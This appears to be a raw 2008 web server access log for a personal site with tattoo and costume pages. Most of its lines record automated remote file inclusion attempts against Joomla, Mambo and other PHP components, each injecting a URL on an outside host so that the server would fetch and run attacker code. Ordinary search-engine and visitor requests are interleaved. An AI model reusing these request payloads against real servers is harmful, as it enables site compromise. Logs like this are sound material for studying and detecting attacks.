61.70.204.99 - - [24/Jun/2008:23:23:29 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
61.70.204.99 - - [24/Jun/2008:23:25:28 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
61.70.204.99 - - [24/Jun/2008:23:25:29 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
74.6.8.113 - - [24/Jun/2008:23:27:43 -0500] "GET /logs/access_log.1164067200 HTTP/1.0" 200 193981 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.203.122.236 - - [24/Jun/2008:23:30:43 -0500] "GET /logs/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:23:30:44 -0500] "GET /modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:23:30:55 -0500] "GET /logs/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:23:30:57 -0500] "GET /modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.148.95.147 - - [24/Jun/2008:23:31:11 -0500] "GET /logs/home.php?i=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:23:31:12 -0500] "GET /home.php?i=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.76"
87.101.4.49 - - [24/Jun/2008:23:34:21 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.101.4.49 - - [24/Jun/2008:23:34:21 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
72.36.175.146 - - [24/Jun/2008:23:39:48 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
72.36.175.146 - - [24/Jun/2008:23:39:48 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
200.49.145.16 - - [24/Jun/2008:23:40:24 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
200.49.145.16 - - [24/Jun/2008:23:40:24 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
201.130.79.38 - - [24/Jun/2008:23:40:51 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
201.130.79.38 - - [24/Jun/2008:23:40:51 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
72.29.75.39 - - [24/Jun/2008:23:42:41 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:23:42:41 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:23:42:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:23:42:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
200.29.4.54 - - [24/Jun/2008:23:45:28 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
193.194.84.215 - - [24/Jun/2008:23:53:28 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:23:53:28 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:23:53:33 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:23:53:33 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
201.16.242.3 - - [24/Jun/2008:23:53:56 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
201.16.242.3 - - [24/Jun/2008:23:53:56 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
201.16.242.3 - - [24/Jun/2008:23:53:57 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
83.149.95.15 - - [24/Jun/2008:23:54:19 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
83.149.95.15 - - [24/Jun/2008:23:54:20 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
64.22.89.194 - - [24/Jun/2008:23:54:42 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Jun/2008:23:54:42 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
201.130.79.38 - - [24/Jun/2008:23:55:30 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
201.130.79.38 - - [24/Jun/2008:23:55:30 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
72.29.75.39 - - [24/Jun/2008:23:56:28 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:23:56:28 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:23:56:29 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:23:56:29 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.197.2 - - [24/Jun/2008:23:56:44 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
74.53.197.2 - - [24/Jun/2008:23:56:45 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
213.218.141.5 - - [24/Jun/2008:23:59:58 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/safe.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
213.218.141.5 - - [24/Jun/2008:23:59:58 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
213.218.141.5 - - [24/Jun/2008:23:59:58 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
213.218.141.5 - - [24/Jun/2008:23:59:59 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
200.49.145.16 - - [25/Jun/2008:00:00:52 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
200.49.145.16 - - [25/Jun/2008:00:00:53 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
87.118.118.156 - - [25/Jun/2008:00:03:37 -0500] "GET /logs/index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.118.118.156 - - [25/Jun/2008:00:03:37 -0500] "GET /index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.6.8.113 - - [25/Jun/2008:00:04:21 -0500] "GET /tattoo/ HTTP/1.0" 200 466 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.148.95.147 - - [25/Jun/2008:00:04:52 -0500] "GET /logs/index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:00:04:53 -0500] "GET /index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
72.29.75.39 - - [25/Jun/2008:00:04:56 -0500] "GET /logs/index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:04:57 -0500] "GET /index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.214.45.147 - - [25/Jun/2008:00:05:44 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
72.29.75.39 - - [25/Jun/2008:00:05:54 -0500] "GET /logs//?page=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 200 88841 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:05:54 -0500] "GET /logs//?page=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 200 88841 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:05:55 -0500] "GET //?page=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:05:55 -0500] "GET //?page=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
209.176.15.10 - - [25/Jun/2008:00:06:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:06:20 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:06:20 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:06:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:06:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:20 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:20 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:21 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:21 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:21 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:21 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:21 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:21 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:22 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:22 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.176.15.10 - - [25/Jun/2008:00:07:22 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
87.118.118.156 - - [25/Jun/2008:00:07:33 -0500] "GET /logs/access_log.1186531200/index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.118.118.156 - - [25/Jun/2008:00:07:46 -0500] "GET /logs/access_log.1207785600/index.php?site1=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
61.70.204.99 - - [25/Jun/2008:00:09:40 -0500] "GET /logs///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 88842 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:09:40 -0500] "GET ///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:09:57 -0500] "GET /logs///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 88842 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:09:58 -0500] "GET ///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:13:21 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:13:21 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:14:02 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:14:02 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
209.132.97.196 - - [25/Jun/2008:00:19:05 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""WebRingChecker/1.71 LWP/5.79"
61.70.204.99 - - [25/Jun/2008:00:27:36 -0500] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:27:36 -0500] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
206.107.211.5 - - [25/Jun/2008:00:28:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:00 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:00 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:05 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
206.107.211.5 - - [25/Jun/2008:00:29:06 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
61.70.204.99 - - [25/Jun/2008:00:32:51 -0500] "GET /logs///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 88842 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:32:52 -0500] "GET ///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:33:06 -0500] "GET /logs///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 88842 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:33:06 -0500] "GET ///?custompluginfile%5B%5D=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:33:06 -0500] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:00:33:07 -0500] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
74.6.8.113 - - [25/Jun/2008:00:36:29 -0500] "GET /logs/access_log.1171843200 HTTP/1.0" 200 172198 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.75.39 - - [25/Jun/2008:00:37:08 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:37:08 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:37:08 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:00:37:08 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
200.203.122.236 - - [25/Jun/2008:00:43:22 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:00:43:22 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:00:43:25 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:00:43:25 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
61.70.204.99 - - [25/Jun/2008:01:00:36 -0500] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:01:00:36 -0500] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
65.55.208.122 - - [25/Jun/2008:01:00:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [25/Jun/2008:01:00:51 -0500] "GET /logs/access_log.1193702400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [25/Jun/2008:01:00:52 -0500] "GET /logs/access_log.1175385600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
61.70.204.99 - - [25/Jun/2008:01:00:55 -0500] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:01:00:55 -0500] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?cat=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
